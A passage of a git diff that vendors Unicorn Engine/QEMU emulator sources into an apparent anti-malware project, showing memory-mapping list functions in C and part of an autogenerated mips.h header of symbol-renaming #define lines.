*/ + create_new_memory_mapping(list, phys_addr, virt_addr, length); +} + +void memory_mapping_list_free(MemoryMappingList *list) +{ + MemoryMapping *p, *q; + + QTAILQ_FOREACH_SAFE(p, &list->head, next, q) { + QTAILQ_REMOVE(&list->head, p, next); + g_free(p); + } + + list->num = 0; + list->last_mapping = NULL; +} + +void memory_mapping_list_init(MemoryMappingList *list) +{ + list->num = 0; + list->last_mapping = NULL; + QTAILQ_INIT(&list->head); +} + +void guest_phys_blocks_free(GuestPhysBlockList *list) +{ + GuestPhysBlock *p, *q; + + QTAILQ_FOREACH_SAFE(p, &list->head, next, q) { + QTAILQ_REMOVE(&list->head, p, next); + g_free(p); + } + list->num = 0; +} + +void guest_phys_blocks_init(GuestPhysBlockList *list) +{ + list->num = 0; + QTAILQ_INIT(&list->head); +} + +typedef struct GuestPhysListener { + GuestPhysBlockList *list; + MemoryListener listener; +} GuestPhysListener; + +void qemu_get_guest_memory_mapping(struct uc_struct *uc, + MemoryMappingList *list, + const GuestPhysBlockList *guest_phys_blocks, + Error **errp) +{ + CPUState *cpu = uc->cpu; + GuestPhysBlock *block; + ram_addr_t offset, length; + + if (cpu_paging_enabled(cpu)) { + Error *err = NULL; + cpu_get_memory_mapping(cpu, list, &err); + if (err) { + error_propagate(errp, err); + return; + } + return; + } + + /* + * If the guest doesn't use paging, the virtual address is equal to physical + * address. 
+ */ + QTAILQ_FOREACH(block, &guest_phys_blocks->head, next) { + offset = block->target_start; + length = block->target_end - block->target_start; + create_new_memory_mapping(list, offset, offset, length); + } +} + +void qemu_get_guest_simple_memory_mapping(MemoryMappingList *list, + const GuestPhysBlockList *guest_phys_blocks) +{ + GuestPhysBlock *block; + + QTAILQ_FOREACH(block, &guest_phys_blocks->head, next) { + create_new_memory_mapping(list, block->target_start, 0, + block->target_end - block->target_start); + } +} + +void memory_mapping_filter(MemoryMappingList *list, int64_t begin, + int64_t length) +{ + MemoryMapping *cur, *next; + + QTAILQ_FOREACH_SAFE(cur, &list->head, next, next) { + if (cur->phys_addr >= begin + length || + cur->phys_addr + cur->length <= begin) { + QTAILQ_REMOVE(&list->head, cur, next); + list->num--; + continue; + } + + if (cur->phys_addr < begin) { + cur->length -= begin - cur->phys_addr; + if (cur->virt_addr) { + cur->virt_addr += begin - cur->phys_addr; + } + cur->phys_addr = begin; + } + + if (cur->phys_addr + cur->length > begin + length) { + cur->length -= cur->phys_addr + cur->length - begin - length; + } + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/mips.h b/ai_anti_malware/unicorn/unicorn-master/qemu/mips.h new file mode 100644 index 0000000..36ad9a4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/mips.h @@ -0,0 +1,3928 @@ +/* Autogen header for Unicorn Engine - DONOT MODIFY */ +#ifndef UNICORN_AUTOGEN_MIPS_H +#define UNICORN_AUTOGEN_MIPS_H +#define arm_release arm_release_mips +#define aarch64_tb_set_jmp_target aarch64_tb_set_jmp_target_mips +#define ppc_tb_set_jmp_target ppc_tb_set_jmp_target_mips +#define use_idiv_instructions_rt use_idiv_instructions_rt_mips +#define tcg_target_deposit_valid tcg_target_deposit_valid_mips +#define helper_power_down helper_power_down_mips +#define check_exit_request check_exit_request_mips +#define address_space_unregister address_space_unregister_mips 
+#define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_mips +#define phys_mem_clean phys_mem_clean_mips +#define tb_cleanup tb_cleanup_mips +#define memory_map memory_map_mips +#define memory_map_ptr memory_map_ptr_mips +#define memory_unmap memory_unmap_mips +#define memory_free memory_free_mips +#define free_code_gen_buffer free_code_gen_buffer_mips +#define helper_raise_exception helper_raise_exception_mips +#define tcg_enabled tcg_enabled_mips +#define tcg_exec_init tcg_exec_init_mips +#define memory_register_types memory_register_types_mips +#define cpu_exec_init_all cpu_exec_init_all_mips +#define vm_start vm_start_mips +#define resume_all_vcpus resume_all_vcpus_mips +#define a15_l2ctlr_read a15_l2ctlr_read_mips +#define a64_translate_init a64_translate_init_mips +#define aa32_generate_debug_exceptions aa32_generate_debug_exceptions_mips +#define aa64_cacheop_access aa64_cacheop_access_mips +#define aa64_daif_access aa64_daif_access_mips +#define aa64_daif_write aa64_daif_write_mips +#define aa64_dczid_read aa64_dczid_read_mips +#define aa64_fpcr_read aa64_fpcr_read_mips +#define aa64_fpcr_write aa64_fpcr_write_mips +#define aa64_fpsr_read aa64_fpsr_read_mips +#define aa64_fpsr_write aa64_fpsr_write_mips +#define aa64_generate_debug_exceptions aa64_generate_debug_exceptions_mips +#define aa64_zva_access aa64_zva_access_mips +#define aarch64_banked_spsr_index aarch64_banked_spsr_index_mips +#define aarch64_restore_sp aarch64_restore_sp_mips +#define aarch64_save_sp aarch64_save_sp_mips +#define accel_find accel_find_mips +#define accel_init_machine accel_init_machine_mips +#define accel_type accel_type_mips +#define access_with_adjusted_size access_with_adjusted_size_mips +#define add128 add128_mips +#define add16_sat add16_sat_mips +#define add16_usat add16_usat_mips +#define add192 add192_mips +#define add8_sat add8_sat_mips +#define add8_usat add8_usat_mips +#define add_cpreg_to_hashtable add_cpreg_to_hashtable_mips +#define add_cpreg_to_list 
add_cpreg_to_list_mips +#define addFloat128Sigs addFloat128Sigs_mips +#define addFloat32Sigs addFloat32Sigs_mips +#define addFloat64Sigs addFloat64Sigs_mips +#define addFloatx80Sigs addFloatx80Sigs_mips +#define add_qemu_ldst_label add_qemu_ldst_label_mips +#define address_space_access_valid address_space_access_valid_mips +#define address_space_destroy address_space_destroy_mips +#define address_space_destroy_dispatch address_space_destroy_dispatch_mips +#define address_space_get_flatview address_space_get_flatview_mips +#define address_space_init address_space_init_mips +#define address_space_init_dispatch address_space_init_dispatch_mips +#define address_space_lookup_region address_space_lookup_region_mips +#define address_space_map address_space_map_mips +#define address_space_read address_space_read_mips +#define address_space_rw address_space_rw_mips +#define address_space_translate address_space_translate_mips +#define address_space_translate_for_iotlb address_space_translate_for_iotlb_mips +#define address_space_translate_internal address_space_translate_internal_mips +#define address_space_unmap address_space_unmap_mips +#define address_space_update_topology address_space_update_topology_mips +#define address_space_update_topology_pass address_space_update_topology_pass_mips +#define address_space_write address_space_write_mips +#define addrrange_contains addrrange_contains_mips +#define addrrange_end addrrange_end_mips +#define addrrange_equal addrrange_equal_mips +#define addrrange_intersection addrrange_intersection_mips +#define addrrange_intersects addrrange_intersects_mips +#define addrrange_make addrrange_make_mips +#define adjust_endianness adjust_endianness_mips +#define all_helpers all_helpers_mips +#define alloc_code_gen_buffer alloc_code_gen_buffer_mips +#define alloc_entry alloc_entry_mips +#define always_true always_true_mips +#define arm1026_initfn arm1026_initfn_mips +#define arm1136_initfn arm1136_initfn_mips +#define arm1136_r2_initfn 
arm1136_r2_initfn_mips +#define arm1176_initfn arm1176_initfn_mips +#define arm11mpcore_initfn arm11mpcore_initfn_mips +#define arm926_initfn arm926_initfn_mips +#define arm946_initfn arm946_initfn_mips +#define arm_ccnt_enabled arm_ccnt_enabled_mips +#define arm_cp_read_zero arm_cp_read_zero_mips +#define arm_cp_reset_ignore arm_cp_reset_ignore_mips +#define arm_cpu_do_interrupt arm_cpu_do_interrupt_mips +#define arm_cpu_exec_interrupt arm_cpu_exec_interrupt_mips +#define arm_cpu_finalizefn arm_cpu_finalizefn_mips +#define arm_cpu_get_phys_page_debug arm_cpu_get_phys_page_debug_mips +#define arm_cpu_handle_mmu_fault arm_cpu_handle_mmu_fault_mips +#define arm_cpu_initfn arm_cpu_initfn_mips +#define arm_cpu_list arm_cpu_list_mips +#define cpu_loop_exit cpu_loop_exit_mips +#define arm_cpu_post_init arm_cpu_post_init_mips +#define arm_cpu_realizefn arm_cpu_realizefn_mips +#define arm_cpu_register_gdb_regs_for_features arm_cpu_register_gdb_regs_for_features_mips +#define arm_cpu_register_types arm_cpu_register_types_mips +#define cpu_resume_from_signal cpu_resume_from_signal_mips +#define arm_cpus arm_cpus_mips +#define arm_cpu_set_pc arm_cpu_set_pc_mips +#define arm_cp_write_ignore arm_cp_write_ignore_mips +#define arm_current_el arm_current_el_mips +#define arm_dc_feature arm_dc_feature_mips +#define arm_debug_excp_handler arm_debug_excp_handler_mips +#define arm_debug_target_el arm_debug_target_el_mips +#define arm_el_is_aa64 arm_el_is_aa64_mips +#define arm_env_get_cpu arm_env_get_cpu_mips +#define arm_excp_target_el arm_excp_target_el_mips +#define arm_excp_unmasked arm_excp_unmasked_mips +#define arm_feature arm_feature_mips +#define arm_generate_debug_exceptions arm_generate_debug_exceptions_mips +#define gen_intermediate_code gen_intermediate_code_mips +#define gen_intermediate_code_pc gen_intermediate_code_pc_mips +#define arm_gen_test_cc arm_gen_test_cc_mips +#define arm_gt_ptimer_cb arm_gt_ptimer_cb_mips +#define arm_gt_vtimer_cb arm_gt_vtimer_cb_mips 
+#define arm_handle_psci_call arm_handle_psci_call_mips +#define arm_is_psci_call arm_is_psci_call_mips +#define arm_is_secure arm_is_secure_mips +#define arm_is_secure_below_el3 arm_is_secure_below_el3_mips +#define arm_ldl_code arm_ldl_code_mips +#define arm_lduw_code arm_lduw_code_mips +#define arm_log_exception arm_log_exception_mips +#define arm_reg_read arm_reg_read_mips +#define arm_reg_reset arm_reg_reset_mips +#define arm_reg_write arm_reg_write_mips +#define restore_state_to_opc restore_state_to_opc_mips +#define arm_rmode_to_sf arm_rmode_to_sf_mips +#define arm_singlestep_active arm_singlestep_active_mips +#define tlb_fill tlb_fill_mips +#define tlb_flush tlb_flush_mips +#define tlb_flush_page tlb_flush_page_mips +#define tlb_set_page tlb_set_page_mips +#define arm_translate_init arm_translate_init_mips +#define arm_v7m_class_init arm_v7m_class_init_mips +#define arm_v7m_cpu_do_interrupt arm_v7m_cpu_do_interrupt_mips +#define ats_access ats_access_mips +#define ats_write ats_write_mips +#define bad_mode_switch bad_mode_switch_mips +#define bank_number bank_number_mips +#define bitmap_zero_extend bitmap_zero_extend_mips +#define bp_wp_matches bp_wp_matches_mips +#define breakpoint_invalidate breakpoint_invalidate_mips +#define build_page_bitmap build_page_bitmap_mips +#define bus_add_child bus_add_child_mips +#define bus_class_init bus_class_init_mips +#define bus_info bus_info_mips +#define bus_unparent bus_unparent_mips +#define cache_block_ops_cp_reginfo cache_block_ops_cp_reginfo_mips +#define cache_dirty_status_cp_reginfo cache_dirty_status_cp_reginfo_mips +#define cache_test_clean_cp_reginfo cache_test_clean_cp_reginfo_mips +#define call_recip_estimate call_recip_estimate_mips +#define can_merge can_merge_mips +#define capacity_increase capacity_increase_mips +#define ccsidr_read ccsidr_read_mips +#define check_ap check_ap_mips +#define check_breakpoints check_breakpoints_mips +#define check_watchpoints check_watchpoints_mips +#define cho cho_mips 
+#define clear_bit clear_bit_mips +#define clz32 clz32_mips +#define clz64 clz64_mips +#define cmp_flatrange_addr cmp_flatrange_addr_mips +#define code_gen_alloc code_gen_alloc_mips +#define commonNaNToFloat128 commonNaNToFloat128_mips +#define commonNaNToFloat16 commonNaNToFloat16_mips +#define commonNaNToFloat32 commonNaNToFloat32_mips +#define commonNaNToFloat64 commonNaNToFloat64_mips +#define commonNaNToFloatx80 commonNaNToFloatx80_mips +#define compute_abs_deadline compute_abs_deadline_mips +#define cond_name cond_name_mips +#define configure_accelerator configure_accelerator_mips +#define container_get container_get_mips +#define container_info container_info_mips +#define container_register_types container_register_types_mips +#define contextidr_write contextidr_write_mips +#define core_log_global_start core_log_global_start_mips +#define core_log_global_stop core_log_global_stop_mips +#define core_memory_listener core_memory_listener_mips +#define cortexa15_cp_reginfo cortexa15_cp_reginfo_mips +#define cortex_a15_initfn cortex_a15_initfn_mips +#define cortexa8_cp_reginfo cortexa8_cp_reginfo_mips +#define cortex_a8_initfn cortex_a8_initfn_mips +#define cortexa9_cp_reginfo cortexa9_cp_reginfo_mips +#define cortex_a9_initfn cortex_a9_initfn_mips +#define cortex_m3_initfn cortex_m3_initfn_mips +#define count_cpreg count_cpreg_mips +#define countLeadingZeros32 countLeadingZeros32_mips +#define countLeadingZeros64 countLeadingZeros64_mips +#define cp_access_ok cp_access_ok_mips +#define cpacr_write cpacr_write_mips +#define cpreg_field_is_64bit cpreg_field_is_64bit_mips +#define cp_reginfo cp_reginfo_mips +#define cpreg_key_compare cpreg_key_compare_mips +#define cpreg_make_keylist cpreg_make_keylist_mips +#define cp_reg_reset cp_reg_reset_mips +#define cpreg_to_kvm_id cpreg_to_kvm_id_mips +#define cpsr_read cpsr_read_mips +#define cpsr_write cpsr_write_mips +#define cptype_valid cptype_valid_mips +#define cpu_abort cpu_abort_mips +#define cpu_arm_exec 
cpu_arm_exec_mips +#define cpu_arm_gen_code cpu_arm_gen_code_mips +#define cpu_arm_init cpu_arm_init_mips +#define cpu_breakpoint_insert cpu_breakpoint_insert_mips +#define cpu_breakpoint_remove cpu_breakpoint_remove_mips +#define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_mips +#define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_mips +#define cpu_can_do_io cpu_can_do_io_mips +#define cpu_can_run cpu_can_run_mips +#define cpu_class_init cpu_class_init_mips +#define cpu_common_class_by_name cpu_common_class_by_name_mips +#define cpu_common_exec_interrupt cpu_common_exec_interrupt_mips +#define cpu_common_get_arch_id cpu_common_get_arch_id_mips +#define cpu_common_get_memory_mapping cpu_common_get_memory_mapping_mips +#define cpu_common_get_paging_enabled cpu_common_get_paging_enabled_mips +#define cpu_common_has_work cpu_common_has_work_mips +#define cpu_common_initfn cpu_common_initfn_mips +#define cpu_common_noop cpu_common_noop_mips +#define cpu_common_parse_features cpu_common_parse_features_mips +#define cpu_common_realizefn cpu_common_realizefn_mips +#define cpu_common_reset cpu_common_reset_mips +#define cpu_dump_statistics cpu_dump_statistics_mips +#define cpu_exec_init cpu_exec_init_mips +#define cpu_flush_icache_range cpu_flush_icache_range_mips +#define cpu_gen_init cpu_gen_init_mips +#define cpu_get_clock cpu_get_clock_mips +#define cpu_get_real_ticks cpu_get_real_ticks_mips +#define cpu_get_tb_cpu_state cpu_get_tb_cpu_state_mips +#define cpu_handle_debug_exception cpu_handle_debug_exception_mips +#define cpu_handle_guest_debug cpu_handle_guest_debug_mips +#define cpu_inb cpu_inb_mips +#define cpu_inl cpu_inl_mips +#define cpu_interrupt cpu_interrupt_mips +#define cpu_interrupt_handler cpu_interrupt_handler_mips +#define cpu_inw cpu_inw_mips +#define cpu_io_recompile cpu_io_recompile_mips +#define cpu_is_stopped cpu_is_stopped_mips +#define cpu_ldl_code cpu_ldl_code_mips +#define cpu_ldub_code cpu_ldub_code_mips +#define 
cpu_lduw_code cpu_lduw_code_mips +#define cpu_memory_rw_debug cpu_memory_rw_debug_mips +#define cpu_mmu_index cpu_mmu_index_mips +#define cpu_outb cpu_outb_mips +#define cpu_outl cpu_outl_mips +#define cpu_outw cpu_outw_mips +#define cpu_physical_memory_clear_dirty_range cpu_physical_memory_clear_dirty_range_mips +#define cpu_physical_memory_get_clean cpu_physical_memory_get_clean_mips +#define cpu_physical_memory_get_dirty cpu_physical_memory_get_dirty_mips +#define cpu_physical_memory_get_dirty_flag cpu_physical_memory_get_dirty_flag_mips +#define cpu_physical_memory_is_clean cpu_physical_memory_is_clean_mips +#define cpu_physical_memory_is_io cpu_physical_memory_is_io_mips +#define cpu_physical_memory_map cpu_physical_memory_map_mips +#define cpu_physical_memory_range_includes_clean cpu_physical_memory_range_includes_clean_mips +#define cpu_physical_memory_reset_dirty cpu_physical_memory_reset_dirty_mips +#define cpu_physical_memory_rw cpu_physical_memory_rw_mips +#define cpu_physical_memory_set_dirty_flag cpu_physical_memory_set_dirty_flag_mips +#define cpu_physical_memory_set_dirty_range cpu_physical_memory_set_dirty_range_mips +#define cpu_physical_memory_unmap cpu_physical_memory_unmap_mips +#define cpu_physical_memory_write_rom cpu_physical_memory_write_rom_mips +#define cpu_physical_memory_write_rom_internal cpu_physical_memory_write_rom_internal_mips +#define cpu_register cpu_register_mips +#define cpu_register_types cpu_register_types_mips +#define cpu_restore_state cpu_restore_state_mips +#define cpu_restore_state_from_tb cpu_restore_state_from_tb_mips +#define cpu_single_step cpu_single_step_mips +#define cpu_tb_exec cpu_tb_exec_mips +#define cpu_tlb_reset_dirty_all cpu_tlb_reset_dirty_all_mips +#define cpu_to_be64 cpu_to_be64_mips +#define cpu_to_le32 cpu_to_le32_mips +#define cpu_to_le64 cpu_to_le64_mips +#define cpu_type_info cpu_type_info_mips +#define cpu_unassigned_access cpu_unassigned_access_mips +#define cpu_watchpoint_address_matches 
cpu_watchpoint_address_matches_mips +#define cpu_watchpoint_insert cpu_watchpoint_insert_mips +#define cpu_watchpoint_remove cpu_watchpoint_remove_mips +#define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_mips +#define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_mips +#define crc32c_table crc32c_table_mips +#define create_new_memory_mapping create_new_memory_mapping_mips +#define csselr_write csselr_write_mips +#define cto32 cto32_mips +#define ctr_el0_access ctr_el0_access_mips +#define ctz32 ctz32_mips +#define ctz64 ctz64_mips +#define dacr_write dacr_write_mips +#define dbgbcr_write dbgbcr_write_mips +#define dbgbvr_write dbgbvr_write_mips +#define dbgwcr_write dbgwcr_write_mips +#define dbgwvr_write dbgwvr_write_mips +#define debug_cp_reginfo debug_cp_reginfo_mips +#define debug_frame debug_frame_mips +#define debug_lpae_cp_reginfo debug_lpae_cp_reginfo_mips +#define define_arm_cp_regs define_arm_cp_regs_mips +#define define_arm_cp_regs_with_opaque define_arm_cp_regs_with_opaque_mips +#define define_debug_regs define_debug_regs_mips +#define define_one_arm_cp_reg define_one_arm_cp_reg_mips +#define define_one_arm_cp_reg_with_opaque define_one_arm_cp_reg_with_opaque_mips +#define deposit32 deposit32_mips +#define deposit64 deposit64_mips +#define deregister_tm_clones deregister_tm_clones_mips +#define device_class_base_init device_class_base_init_mips +#define device_class_init device_class_init_mips +#define device_finalize device_finalize_mips +#define device_get_realized device_get_realized_mips +#define device_initfn device_initfn_mips +#define device_post_init device_post_init_mips +#define device_reset device_reset_mips +#define device_set_realized device_set_realized_mips +#define device_type_info device_type_info_mips +#define disas_arm_insn disas_arm_insn_mips +#define disas_coproc_insn disas_coproc_insn_mips +#define disas_dsp_insn disas_dsp_insn_mips +#define disas_iwmmxt_insn disas_iwmmxt_insn_mips +#define disas_neon_data_insn 
disas_neon_data_insn_mips +#define disas_neon_ls_insn disas_neon_ls_insn_mips +#define disas_thumb2_insn disas_thumb2_insn_mips +#define disas_thumb_insn disas_thumb_insn_mips +#define disas_vfp_insn disas_vfp_insn_mips +#define disas_vfp_v8_insn disas_vfp_v8_insn_mips +#define do_arm_semihosting do_arm_semihosting_mips +#define do_clz16 do_clz16_mips +#define do_clz8 do_clz8_mips +#define do_constant_folding do_constant_folding_mips +#define do_constant_folding_2 do_constant_folding_2_mips +#define do_constant_folding_cond do_constant_folding_cond_mips +#define do_constant_folding_cond2 do_constant_folding_cond2_mips +#define do_constant_folding_cond_32 do_constant_folding_cond_32_mips +#define do_constant_folding_cond_64 do_constant_folding_cond_64_mips +#define do_constant_folding_cond_eq do_constant_folding_cond_eq_mips +#define do_fcvt_f16_to_f32 do_fcvt_f16_to_f32_mips +#define do_fcvt_f32_to_f16 do_fcvt_f32_to_f16_mips +#define do_ssat do_ssat_mips +#define do_usad do_usad_mips +#define do_usat do_usat_mips +#define do_v7m_exception_exit do_v7m_exception_exit_mips +#define dummy_c15_cp_reginfo dummy_c15_cp_reginfo_mips +#define dummy_func dummy_func_mips +#define dummy_section dummy_section_mips +#define _DYNAMIC _DYNAMIC_mips +#define _edata _edata_mips +#define _end _end_mips +#define end_list end_list_mips +#define eq128 eq128_mips +#define ErrorClass_lookup ErrorClass_lookup_mips +#define error_copy error_copy_mips +#define error_exit error_exit_mips +#define error_get_class error_get_class_mips +#define error_get_pretty error_get_pretty_mips +#define error_setg_file_open error_setg_file_open_mips +#define estimateDiv128To64 estimateDiv128To64_mips +#define estimateSqrt32 estimateSqrt32_mips +#define excnames excnames_mips +#define excp_is_internal excp_is_internal_mips +#define extended_addresses_enabled extended_addresses_enabled_mips +#define extended_mpu_ap_bits extended_mpu_ap_bits_mips +#define extract32 extract32_mips +#define extract64 
extract64_mips +#define extractFloat128Exp extractFloat128Exp_mips +#define extractFloat128Frac0 extractFloat128Frac0_mips +#define extractFloat128Frac1 extractFloat128Frac1_mips +#define extractFloat128Sign extractFloat128Sign_mips +#define extractFloat16Exp extractFloat16Exp_mips +#define extractFloat16Frac extractFloat16Frac_mips +#define extractFloat16Sign extractFloat16Sign_mips +#define extractFloat32Exp extractFloat32Exp_mips +#define extractFloat32Frac extractFloat32Frac_mips +#define extractFloat32Sign extractFloat32Sign_mips +#define extractFloat64Exp extractFloat64Exp_mips +#define extractFloat64Frac extractFloat64Frac_mips +#define extractFloat64Sign extractFloat64Sign_mips +#define extractFloatx80Exp extractFloatx80Exp_mips +#define extractFloatx80Frac extractFloatx80Frac_mips +#define extractFloatx80Sign extractFloatx80Sign_mips +#define fcse_write fcse_write_mips +#define find_better_copy find_better_copy_mips +#define find_default_machine find_default_machine_mips +#define find_desc_by_name find_desc_by_name_mips +#define find_first_bit find_first_bit_mips +#define find_paging_enabled_cpu find_paging_enabled_cpu_mips +#define find_ram_block find_ram_block_mips +#define find_ram_offset find_ram_offset_mips +#define find_string find_string_mips +#define find_type find_type_mips +#define _fini _fini_mips +#define flatrange_equal flatrange_equal_mips +#define flatview_destroy flatview_destroy_mips +#define flatview_init flatview_init_mips +#define flatview_insert flatview_insert_mips +#define flatview_lookup flatview_lookup_mips +#define flatview_ref flatview_ref_mips +#define flatview_simplify flatview_simplify_mips +#define flatview_unref flatview_unref_mips +#define float128_add float128_add_mips +#define float128_compare float128_compare_mips +#define float128_compare_internal float128_compare_internal_mips +#define float128_compare_quiet float128_compare_quiet_mips +#define float128_default_nan float128_default_nan_mips +#define float128_div 
float128_div_mips +#define float128_eq float128_eq_mips +#define float128_eq_quiet float128_eq_quiet_mips +#define float128_is_quiet_nan float128_is_quiet_nan_mips +#define float128_is_signaling_nan float128_is_signaling_nan_mips +#define float128_le float128_le_mips +#define float128_le_quiet float128_le_quiet_mips +#define float128_lt float128_lt_mips +#define float128_lt_quiet float128_lt_quiet_mips +#define float128_maybe_silence_nan float128_maybe_silence_nan_mips +#define float128_mul float128_mul_mips +#define float128_rem float128_rem_mips +#define float128_round_to_int float128_round_to_int_mips +#define float128_scalbn float128_scalbn_mips +#define float128_sqrt float128_sqrt_mips +#define float128_sub float128_sub_mips +#define float128ToCommonNaN float128ToCommonNaN_mips +#define float128_to_float32 float128_to_float32_mips +#define float128_to_float64 float128_to_float64_mips +#define float128_to_floatx80 float128_to_floatx80_mips +#define float128_to_int32 float128_to_int32_mips +#define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_mips +#define float128_to_int64 float128_to_int64_mips +#define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_mips +#define float128_unordered float128_unordered_mips +#define float128_unordered_quiet float128_unordered_quiet_mips +#define float16_default_nan float16_default_nan_mips +#define float16_is_quiet_nan float16_is_quiet_nan_mips +#define float16_is_signaling_nan float16_is_signaling_nan_mips +#define float16_maybe_silence_nan float16_maybe_silence_nan_mips +#define float16ToCommonNaN float16ToCommonNaN_mips +#define float16_to_float32 float16_to_float32_mips +#define float16_to_float64 float16_to_float64_mips +#define float32_abs float32_abs_mips +#define float32_add float32_add_mips +#define float32_chs float32_chs_mips +#define float32_compare float32_compare_mips +#define float32_compare_internal float32_compare_internal_mips +#define float32_compare_quiet 
float32_compare_quiet_mips +#define float32_default_nan float32_default_nan_mips +#define float32_div float32_div_mips +#define float32_eq float32_eq_mips +#define float32_eq_quiet float32_eq_quiet_mips +#define float32_exp2 float32_exp2_mips +#define float32_exp2_coefficients float32_exp2_coefficients_mips +#define float32_is_any_nan float32_is_any_nan_mips +#define float32_is_infinity float32_is_infinity_mips +#define float32_is_neg float32_is_neg_mips +#define float32_is_quiet_nan float32_is_quiet_nan_mips +#define float32_is_signaling_nan float32_is_signaling_nan_mips +#define float32_is_zero float32_is_zero_mips +#define float32_is_zero_or_denormal float32_is_zero_or_denormal_mips +#define float32_le float32_le_mips +#define float32_le_quiet float32_le_quiet_mips +#define float32_log2 float32_log2_mips +#define float32_lt float32_lt_mips +#define float32_lt_quiet float32_lt_quiet_mips +#define float32_max float32_max_mips +#define float32_maxnum float32_maxnum_mips +#define float32_maxnummag float32_maxnummag_mips +#define float32_maybe_silence_nan float32_maybe_silence_nan_mips +#define float32_min float32_min_mips +#define float32_minmax float32_minmax_mips +#define float32_minnum float32_minnum_mips +#define float32_minnummag float32_minnummag_mips +#define float32_mul float32_mul_mips +#define float32_muladd float32_muladd_mips +#define float32_rem float32_rem_mips +#define float32_round_to_int float32_round_to_int_mips +#define float32_scalbn float32_scalbn_mips +#define float32_set_sign float32_set_sign_mips +#define float32_sqrt float32_sqrt_mips +#define float32_squash_input_denormal float32_squash_input_denormal_mips +#define float32_sub float32_sub_mips +#define float32ToCommonNaN float32ToCommonNaN_mips +#define float32_to_float128 float32_to_float128_mips +#define float32_to_float16 float32_to_float16_mips +#define float32_to_float64 float32_to_float64_mips +#define float32_to_floatx80 float32_to_floatx80_mips +#define float32_to_int16 
float32_to_int16_mips +#define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_mips +#define float32_to_int32 float32_to_int32_mips +#define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_mips +#define float32_to_int64 float32_to_int64_mips +#define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_mips +#define float32_to_uint16 float32_to_uint16_mips +#define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_mips +#define float32_to_uint32 float32_to_uint32_mips +#define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_mips +#define float32_to_uint64 float32_to_uint64_mips +#define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_mips +#define float32_unordered float32_unordered_mips +#define float32_unordered_quiet float32_unordered_quiet_mips +#define float64_abs float64_abs_mips +#define float64_add float64_add_mips +#define float64_chs float64_chs_mips +#define float64_compare float64_compare_mips +#define float64_compare_internal float64_compare_internal_mips +#define float64_compare_quiet float64_compare_quiet_mips +#define float64_default_nan float64_default_nan_mips +#define float64_div float64_div_mips +#define float64_eq float64_eq_mips +#define float64_eq_quiet float64_eq_quiet_mips +#define float64_is_any_nan float64_is_any_nan_mips +#define float64_is_infinity float64_is_infinity_mips +#define float64_is_neg float64_is_neg_mips +#define float64_is_quiet_nan float64_is_quiet_nan_mips +#define float64_is_signaling_nan float64_is_signaling_nan_mips +#define float64_is_zero float64_is_zero_mips +#define float64_le float64_le_mips +#define float64_le_quiet float64_le_quiet_mips +#define float64_log2 float64_log2_mips +#define float64_lt float64_lt_mips +#define float64_lt_quiet float64_lt_quiet_mips +#define float64_max float64_max_mips +#define float64_maxnum float64_maxnum_mips +#define float64_maxnummag float64_maxnummag_mips +#define float64_maybe_silence_nan 
float64_maybe_silence_nan_mips +#define float64_min float64_min_mips +#define float64_minmax float64_minmax_mips +#define float64_minnum float64_minnum_mips +#define float64_minnummag float64_minnummag_mips +#define float64_mul float64_mul_mips +#define float64_muladd float64_muladd_mips +#define float64_rem float64_rem_mips +#define float64_round_to_int float64_round_to_int_mips +#define float64_scalbn float64_scalbn_mips +#define float64_set_sign float64_set_sign_mips +#define float64_sqrt float64_sqrt_mips +#define float64_squash_input_denormal float64_squash_input_denormal_mips +#define float64_sub float64_sub_mips +#define float64ToCommonNaN float64ToCommonNaN_mips +#define float64_to_float128 float64_to_float128_mips +#define float64_to_float16 float64_to_float16_mips +#define float64_to_float32 float64_to_float32_mips +#define float64_to_floatx80 float64_to_floatx80_mips +#define float64_to_int16 float64_to_int16_mips +#define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_mips +#define float64_to_int32 float64_to_int32_mips +#define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_mips +#define float64_to_int64 float64_to_int64_mips +#define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_mips +#define float64_to_uint16 float64_to_uint16_mips +#define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_mips +#define float64_to_uint32 float64_to_uint32_mips +#define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_mips +#define float64_to_uint64 float64_to_uint64_mips +#define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_mips +#define float64_trunc_to_int float64_trunc_to_int_mips +#define float64_unordered float64_unordered_mips +#define float64_unordered_quiet float64_unordered_quiet_mips +#define float_raise float_raise_mips +#define floatx80_add floatx80_add_mips +#define floatx80_compare floatx80_compare_mips +#define floatx80_compare_internal 
floatx80_compare_internal_mips +#define floatx80_compare_quiet floatx80_compare_quiet_mips +#define floatx80_default_nan floatx80_default_nan_mips +#define floatx80_div floatx80_div_mips +#define floatx80_eq floatx80_eq_mips +#define floatx80_eq_quiet floatx80_eq_quiet_mips +#define floatx80_is_quiet_nan floatx80_is_quiet_nan_mips +#define floatx80_is_signaling_nan floatx80_is_signaling_nan_mips +#define floatx80_le floatx80_le_mips +#define floatx80_le_quiet floatx80_le_quiet_mips +#define floatx80_lt floatx80_lt_mips +#define floatx80_lt_quiet floatx80_lt_quiet_mips +#define floatx80_maybe_silence_nan floatx80_maybe_silence_nan_mips +#define floatx80_mul floatx80_mul_mips +#define floatx80_rem floatx80_rem_mips +#define floatx80_round_to_int floatx80_round_to_int_mips +#define floatx80_scalbn floatx80_scalbn_mips +#define floatx80_sqrt floatx80_sqrt_mips +#define floatx80_sub floatx80_sub_mips +#define floatx80ToCommonNaN floatx80ToCommonNaN_mips +#define floatx80_to_float128 floatx80_to_float128_mips +#define floatx80_to_float32 floatx80_to_float32_mips 